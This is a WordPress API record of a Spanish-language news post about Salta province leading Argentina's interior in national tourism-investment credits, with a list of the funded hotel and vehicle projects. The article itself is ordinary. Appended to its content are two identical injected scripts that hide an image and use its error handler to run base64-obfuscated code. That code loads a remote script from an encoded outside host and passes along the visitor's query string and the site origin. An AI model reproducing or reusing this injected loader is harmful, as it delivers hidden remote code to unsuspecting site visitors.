{"id":2849,"date":"2023-07-13T10:11:20","date_gmt":"2023-07-13T13:11:20","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2849"},"modified":"2025-08-14T00:12:49","modified_gmt":"2025-08-14T03:12:49","slug":"salta-lidera-la-inversion-en-el-interior-del-pais-en-proyectos-turisticos-con-mas-de-2-mil-millones-de-pesos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2849","title":{"rendered":"Salta lidera la inversi\u00f3n en el interior del pa\u00eds en proyectos tur\u00edsticos con m\u00e1s de 2 mil millones de pesos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b10631\"><em>El Ministerio de Turismo y Deportes de la Naci\u00f3n inform\u00f3 que la provincia es el primer destino del interior del pa\u00eds en haber presentado proyectos de inversi\u00f3n y haber obtenido los recursos necesarios para invertir en nuevos proyectos y ampliaciones de otros existentes.<\/em><\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes<strong>&nbsp;Mario Pe\u00f1a<\/strong>&nbsp;y la subsecretaria de Desarrollo Estrat\u00e9gico del Ministerio de Turismo y Deportes de la Naci\u00f3n,&nbsp;<strong>Eugenia Benedetti<\/strong>, se reunieron con emprendedores locales que resultaron beneficiarios de la l\u00ednea de financiamiento nacional y otros que se encuentran en etapa de validaci\u00f3n.<\/p>\n\n\n\n<p>Durante el encuentro, la funcionaria nacional destac\u00f3 a Salta como la primera Provincia del interior del pa\u00eds en t\u00e9rminos de presentaci\u00f3n y obtenci\u00f3n de financiamiento correspondiente a esta l\u00ednea de cr\u00e9ditos.<\/p>\n\n\n\n<p>Cabe destacar que por decisi\u00f3n del Gobernador<strong>&nbsp;Gustavo S\u00e1enz<\/strong>, el Gobierno provincial acompa\u00f1\u00f3 esta l\u00ednea de cr\u00e9ditos con el aporte de 5 puntos sobre la tasa de inter\u00e9s. La determinaci\u00f3n tomada por el mandatario fue, y sigue siendo hasta la actualidad, la \u00fanica medida provincial de acompa\u00f1amiento para con el sector tur\u00edstico en el pa\u00eds.<\/p>\n\n\n\n<p>\u201cLos resultados de esta primera etapa son muy buenos para Salta y su participaci\u00f3n ha sido muy relevante por la decisi\u00f3n de acompa\u00f1ar con 5 puntos extras\u201d, destac\u00f3 la funcionaria nacional, quien adem\u00e1s agreg\u00f3 que en los pr\u00f3ximos d\u00edas se anunciar\u00e1 una extensi\u00f3n de esta l\u00ednea de cr\u00e9dito.<\/p>\n\n\n\n<p>Por su parte, el ministro Pe\u00f1a puntualiz\u00f3 en la importancia de continuar trabajando mancomunadamente con el sector privado a fin de seguir trabajando por el desarrollo de la actividad tur\u00edstica.&nbsp;<\/p>\n\n\n\n<p>\u201cPara nosotros es clave el acompa\u00f1amiento planteado por el Gobernador y por supuesto encontrar resonancia a nivel nacional con el Ministro Lammens y todo su equipo. La potencia de estos aspectos se ve claramente reflejado en los resultados que estamos viendo hoy. Las inversiones son claves al momento de generar m\u00e1s trabajo y oportunidades para los salte\u00f1os, tal cual lo hemos planteado en el Plan Liderar\u201d, remarc\u00f3 el funcionario provincial.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7963-.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7963-.jpg\" alt=\".\" width=\"345\" height=\"230\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>La visi\u00f3n del sector privado<\/strong><\/p>\n\n\n\n<p>Mariano Cardoner, integrante del Grupo 3 Cerritos que est\u00e1 llevando adelante la inversi\u00f3n para instalar un hotel Dazzler en la capital provincial, valor\u00f3 como fundamental la puesta en marcha de esta l\u00ednea de cr\u00e9dito.<\/p>\n\n\n\n<p>\u201cEl acompa\u00f1amiento ofrecido por ambos gobiernos ha sido muy importante para nosotros que elegimos seguir apostando por nuestro lugar que es algo que forma parte de la impronta del grupo y ese es nuestro compromiso con Salta\u201d, se\u00f1al\u00f3 Cardoner.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7964-.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7964-.jpg\" alt=\".\" width=\"317\" height=\"211\"\/><\/a><\/figure><\/div>\n\n\n<p>Finalmente, Brenda Buchanan, gerenta general del Hotel Villa Vicu\u00f1a, destac\u00f3 la activa y comprometida participaci\u00f3n que tiene el Banco Naci\u00f3n en todo el proceso de an\u00e1lisis y selecci\u00f3n de los proyectos que se postulan para este financiamiento. \u201cNos sentimos muy gratificados con el trato que hemos recibido por parte del Banco Naci\u00f3n al momento de acercarse y evaluar nuestro proyecto de ampliaci\u00f3n porque se interesaron en conocer realmente el esp\u00edritu de nuestro emprendimiento\u201d.<\/p>\n\n\n\n<p>Participaron de la reuni\u00f3n la secretaria de turismo Nadia Loza, el subsecretario de desarrollo y competitividad tur\u00edstica, Alejandro Cha, la directora nacional de inversiones del Ministerio de Turismo y Deportes de la Naci\u00f3n, Carolina Destefano, el presidente de la C\u00e1mara de Turismo Juan Lucero, autoridades zonales del Banco Naci\u00f3n y empresarios locales.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7965-.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7965-.jpg\" alt=\".\" width=\"341\" height=\"227\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Los proyectos a ejecutarse<\/strong><\/p>\n\n\n\n<p>Los proyectos a ejecutarse con los fondos provenientes de la l\u00ednea de cr\u00e9dito nacional son:<\/p>\n\n\n\n<p>* Finalizaci\u00f3n obras y equipamiento Hotel Dazzler Salta<\/p>\n\n\n\n<p>* Ampliaci\u00f3n Hotel Villa Vicu\u00f1a en Cafayate.<\/p>\n\n\n\n<p>* Ampliaci\u00f3n Hotel Iraola en Cafayate.<\/p>\n\n\n\n<p>* Ampliaci\u00f3n flota de veh\u00edculos Rada Rent a Car.<\/p>\n\n\n\n<p>* Construcci\u00f3n nuevo Apart Hotel en Cafayate (Grupo Gomez Rocco).<\/p>\n\n\n\n<p>* Construcci\u00f3n alojamiento Pueblo Puna en Cachi.<\/p>\n\n\n\n<p>* Agencia de Viajes Willka Turismo (Leg 14.707) &#8211; Ampliaci\u00f3n parque automotor.&nbsp;<\/p>\n\n\n\n<p>* Amalinas Park &#8211; Ampliaci\u00f3n de Infraestructura para aumento de plazas hoteleras.<\/p>\n\n\n\n<p>* Hotel Salta &#8211; Renovaci\u00f3n y ampliaci\u00f3n del establecimiento m\u00e1s renovaci\u00f3n de equipamiento.<\/p>\n\n\n\n<p>* Hotel Altalaluna hotel boutique &amp; spa &#8211; Renovaci\u00f3n y puesta en valor.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta lidera la inversi\u00f3n en el interior del pa\u00eds en proyectos tur\u00edsticos con m\u00e1s de $2 mil millones\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/9VRQTJza6Mc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes de la Naci\u00f3n inform\u00f3 que la provincia es el primer destino del interior del pa\u00eds en haber presentado proyectos de inversi\u00f3n y haber obtenido los recursos necesarios para invertir en nuevos proyectos y ampliaciones de otros existentes. El ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a&nbsp;y la subsecretaria de Desarrollo Estrat\u00e9gico [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2850,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-2849","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2849"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2849"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2849\/revisions"}],"predecessor-version":[{"id":7026,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2849\/revisions\/7026"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2850"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}